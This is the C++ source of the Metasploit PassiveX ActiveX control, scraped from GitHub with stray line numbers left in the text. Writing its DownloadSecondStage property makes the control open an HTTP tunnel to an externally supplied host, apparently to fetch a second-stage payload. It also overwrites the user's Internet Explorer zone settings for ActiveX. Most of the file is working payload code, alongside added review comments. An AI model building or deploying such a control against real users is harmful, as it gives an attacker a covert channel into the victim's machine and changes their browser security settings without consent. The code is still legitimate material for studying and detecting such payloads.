GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/passivex/CPassiveX.cpp
/*
 * This file is part of the Metasploit Exploit Framework
 * and is subject to the same licenses and copyrights as
 * the rest of this package.
 */
#include "PassiveXLib.h"
#include "CPassiveX.h"
#ifdef PXDEBUG
10
static FILE *DebugFd = NULL;
11
#endif
/*
 * Constructs the control with the HTTP port cleared. Initialize() only starts
 * the tunnel once both a host and a non-zero port have been supplied, so a
 * freshly constructed object does nothing until its properties are set.
 */
CPassiveX::CPassiveX() : PropHttpPort(0)
{
}
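/*
 * Stops the HTTP tunnel and, in PXDEBUG builds, closes the debug log.
 */
CPassiveX::~CPassiveX()
{
	Tunnel.Stop();

#ifdef PXDEBUG
	if (DebugFd)
	{
		fclose(DebugFd);

		// DebugFd is a file-scope static shared by all instances. Clear it so
		// a later Log() call reopens the file instead of writing through a
		// FILE* that has already been closed.
		DebugFd = NULL;
	}
#endif
}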
/*
 * Reports whether error information is supported for the given interface.
 * Only IID_IPassiveX is answered with S_OK; any other interface ID yields
 * S_FALSE.
 */
STDMETHODIMP CPassiveX::InterfaceSupportsErrorInfo(REFIID riid)
{
	return ::InlineIsEqualGUID(IID_IPassiveX, riid) ? S_OK : S_FALSE;
}
/**************
 * Properties *
 **************/
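/*
 * Property getter for the HTTP host.
 *
 * Host receives the stored value. Returns E_POINTER when Host is NULL,
 * otherwise S_OK.
 */
HRESULT CPassiveX::get_HttpHost(BSTR *Host)
{
	// A NULL out pointer would otherwise be dereferenced below
	if (!Host)
		return E_POINTER;

	// NOTE(review): this appears to hand out the stored string itself rather
	// than a copy. COM callers normally free a BSTR received through an out
	// parameter, so confirm the type of PropHttpHost (declared outside this
	// file) and whether a copy has to be returned instead.
	*Host = PropHttpHost;

	return S_OK;
}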
/*
 * Property setter for the HTTP host that Initialize() later hands to the
 * tunnel. Always returns S_OK.
 */
HRESULT CPassiveX::put_HttpHost(BSTR Host)
{
	// Stored exactly as supplied; no validation is performed here.
	// NOTE(review): whether this assignment copies the string depends on the
	// type of PropHttpHost, which is declared outside this file - confirm.
	PropHttpHost = Host;

	return S_OK;
}
54
55
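/*
 * Property getter for the HTTP session identifier.
 *
 * Sid receives the stored value. Returns E_POINTER when Sid is NULL,
 * otherwise S_OK.
 */
HRESULT CPassiveX::get_HttpSid(BSTR *Sid)
{
	// A NULL out pointer would otherwise be dereferenced below
	if (!Sid)
		return E_POINTER;

	// NOTE(review): this appears to hand out the stored string itself rather
	// than a copy. COM callers normally free a BSTR received through an out
	// parameter, so confirm the type of PropHttpSid (declared outside this
	// file) and whether a copy has to be returned instead.
	*Sid = PropHttpSid;

	return S_OK;
}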
61
62
/*
 * Property setter for the HTTP session identifier that Initialize() later
 * hands to the tunnel. Always returns S_OK.
 */
HRESULT CPassiveX::put_HttpSid(BSTR Sid)
{
	// Stored exactly as supplied; no validation is performed here.
	// NOTE(review): whether this assignment copies the string depends on the
	// type of PropHttpSid, which is declared outside this file - confirm.
	PropHttpSid = Sid;

	return S_OK;
}
68
69
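/*
 * Property getter for the HTTP URI base.
 *
 * UriBase receives the stored value. Returns E_POINTER when UriBase is NULL,
 * otherwise S_OK.
 */
HRESULT CPassiveX::get_HttpUriBase(BSTR *UriBase)
{
	// A NULL out pointer would otherwise be dereferenced below
	if (!UriBase)
		return E_POINTER;

	// NOTE(review): this appears to hand out the stored string itself rather
	// than a copy. COM callers normally free a BSTR received through an out
	// parameter, so confirm the type of PropHttpUriBase (declared outside
	// this file) and whether a copy has to be returned instead.
	*UriBase = PropHttpUriBase;

	return S_OK;
}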
75
76
/*
 * Property setter for the HTTP URI base that Initialize() later hands to the
 * tunnel. Always returns S_OK.
 */
HRESULT CPassiveX::put_HttpUriBase(BSTR UriBase)
{
	// Stored exactly as supplied; no validation is performed here.
	// NOTE(review): whether this assignment copies the string depends on the
	// type of PropHttpUriBase, which is declared outside this file - confirm.
	PropHttpUriBase = UriBase;

	return S_OK;
}
82
83
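/*
 * Property getter for the HTTP port.
 *
 * Port receives the stored value. Returns E_POINTER when Port is NULL,
 * otherwise S_OK.
 */
HRESULT CPassiveX::get_HttpPort(ULONG *Port)
{
	// A NULL out pointer would otherwise be dereferenced below
	if (!Port)
		return E_POINTER;

	*Port = PropHttpPort;

	return S_OK;
}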
89
90
/*
 * Property setter for the HTTP port. Always returns S_OK.
 */
HRESULT CPassiveX::put_HttpPort(ULONG Port)
{
	// Stored without a range check. Initialize() narrows the value with a
	// (USHORT) cast, so anything above 65535 is truncated there rather than
	// rejected here.
	PropHttpPort = Port;

	return S_OK;
}
96
97
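/*
 * Property getter for DownloadSecondStage. No value is stored for this
 * property in this file, so the getter reports zero.
 *
 * Returns E_POINTER when Port is NULL, otherwise S_OK.
 */
HRESULT CPassiveX::get_DownloadSecondStage(ULONG *Port)
{
	if (!Port)
		return E_POINTER;

	// Give the out parameter a defined value; returning S_OK without writing
	// it would leave the caller reading whatever the variable held before.
	*Port = 0;

	return S_OK;
}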
101
102
/*
 * Property setter for DownloadSecondStage. Writing the property acts as a
 * trigger: it calls Initialize() and always returns S_OK.
 */
HRESULT CPassiveX::put_DownloadSecondStage(ULONG Port)
{
	// The Port argument is not used; every write runs Initialize(), whatever
	// value was supplied.
	Initialize();

	return S_OK;
}
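#ifdef PXDEBUG
/*
 * Logs a printf-style message to %TEMP%\PassiveX.log for debugging purposes.
 *
 * The file is opened in append mode on first use and the stream is kept in
 * the file-scope DebugFd. If the log cannot be opened the message is dropped.
 * Because the file is appended to and is not deleted in this file, it remains
 * on disk as an artifact of PXDEBUG builds.
 *
 * fmt is handed to vfprintf as the format string, so callers must pass a
 * constant format and supply any externally supplied text as an argument.
 */
VOID CPassiveX::Log(LPCTSTR fmt, ...)
{
	// If we haven't opened the debug log yet...
	if (!DebugFd)
	{
		TCHAR DebugFilePath[MAX_PATH];
		const DWORD Capacity = (sizeof(DebugFilePath) / sizeof(TCHAR)) - 1;
		DWORD Length;

		ZeroMemory(
				DebugFilePath,
				sizeof(DebugFilePath));

		Length = ExpandEnvironmentStrings(
				TEXT("%TEMP%\\PassiveX.log"),
				DebugFilePath,
				Capacity);

		// Zero means the expansion failed; a value above the capacity means
		// the expanded path did not fit. Either way the buffer does not hold
		// a usable path, so skip logging rather than open whatever is in it.
		if ((Length == 0) ||
		    (Length > Capacity))
			return;

		// Try to open the debug log file
		// NOTE(review): fopen takes a narrow path while DebugFilePath is a
		// TCHAR buffer - confirm how this is meant to build when _UNICODE is
		// defined.
		DebugFd = fopen(
				DebugFilePath,
				"a");
	}

	// Without a valid debug file descriptor there is nowhere to write
	if (!DebugFd)
		return;

	va_list Args;

	va_start(
			Args,
			fmt);

#ifndef _UNICODE
	vfprintf(
			DebugFd,
			fmt,
			Args);
#else
	// Lame...
	// Only the format string is converted to ANSI here; the variadic
	// arguments are passed through unchanged.
	{
		USES_CONVERSION;

		LPCSTR AsciiString = OLE2A(fmt);

		vfprintf(
				DebugFd,
				AsciiString,
				Args);
	}
#endif

	va_end(
			Args);

	// Flush on every call so the log is current if the process dies
	fflush(
			DebugFd);
}
#endif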
/*********************
 * Protected Methods *
 *********************/
/*
 * Creates the HTTP tunnel when both a host and a non-zero port have been
 * configured, then restores the Internet Explorer zone restrictions to their
 * defaults. The zone reset runs whether or not the tunnel was started.
 */
VOID CPassiveX::Initialize()
{
	USES_CONVERSION;

	// The tunnel is only started once a host and a non-zero port are set
	if (PropHttpHost && PropHttpPort)
	{
		// NOTE(review): the OLE2A conversions are believed to be stack
		// allocated by ATL, so the length of these property strings drives
		// stack use - confirm they are bounded before they reach this point.
		// The port is narrowed from ULONG, so values above 65535 are
		// truncated by the cast.
		Tunnel.Start(
				OLE2A(PropHttpHost),
				OLE2A(PropHttpUriBase),
				OLE2A(PropHttpSid),
				(USHORT)PropHttpPort);
	}

	// Put the zone restrictions back to their defaults in every case
	ResetExplorerZoneRestrictions();
}
/*
 * Resets the internet explorer zone restrictions back to their defaults such
 * that people aren't left vulnerable.
 *
 * Four ActiveX-related values under the current user's Internet zone key
 * (Zones\3) are overwritten with fixed settings. The previous values are not
 * read, so this writes assumed defaults rather than restoring what the user
 * had. The results of the individual writes are not checked, and nothing is
 * written if the key cannot be opened. Changes to these four values are the
 * registry trace this routine leaves behind.
 */
VOID CPassiveX::ResetExplorerZoneRestrictions()
{
	// Value name and setting pairs, written in this order.
	// Settings: 0 = Enabled, 1 = Prompt, 3 = Disabled
	static const struct
	{
		LPCTSTR Name;
		ULONG   Setting;
	} ZoneDefaults[] =
	{
		{ TEXT("1004"), 3 }, // Download unsigned ActiveX controls
		{ TEXT("1201"), 3 }, // Initialize and script ActiveX controls not marked as safe
		{ TEXT("1001"), 1 }, // Download signed ActiveX controls
		{ TEXT("1200"), 0 }  // Run ActiveX controls and plugins
	};
	const unsigned int Count = sizeof(ZoneDefaults) / sizeof(ZoneDefaults[0]);
	HKEY InternetZoneKey = NULL;

	// Open the internet zone; without write access there is nothing to do
	if (RegOpenKeyEx(
			HKEY_CURRENT_USER,
			TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3"),
			0,
			KEY_WRITE,
			&InternetZoneKey) != ERROR_SUCCESS)
		return;

	for (unsigned int Index = 0; Index < Count; Index++)
	{
		ULONG Value = ZoneDefaults[Index].Setting;

		RegSetValueEx(
				InternetZoneKey,
				ZoneDefaults[Index].Name,
				0,
				REG_DWORD,
				(LPBYTE)&Value,
				sizeof(Value));
	}

	RegCloseKey(
			InternetZoneKey);
}